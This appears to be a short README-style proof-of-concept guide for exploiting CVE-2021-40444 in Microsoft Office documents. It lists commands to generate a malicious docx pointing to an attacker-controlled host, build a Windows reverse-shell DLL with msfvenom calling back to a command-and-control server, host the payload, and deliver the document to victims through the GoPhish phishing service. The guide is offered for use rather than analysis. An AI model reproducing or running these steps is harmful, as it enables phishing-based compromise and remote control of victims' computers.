CVE-2021-40444
PoC Guide
Step 1: Download PoC Resource
Step 2: Generate malicious document
python3 exploit.py generate test/calc.dll http://<your attacker ip address>
Generate Reverse Shell by using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<C2 Server IP> LPORT=<C2 Server Port> -f dll > word.dll
Step 3: Deliver this malicious to victim by using Gophish
Setup the server for delivering cab file to victim who click on docx file
python3 exploit.py host 80
After generate malicious docx, we will use GoPhish (Phishing Mail Service) for delivering this docx to victim.
Demo Video
Title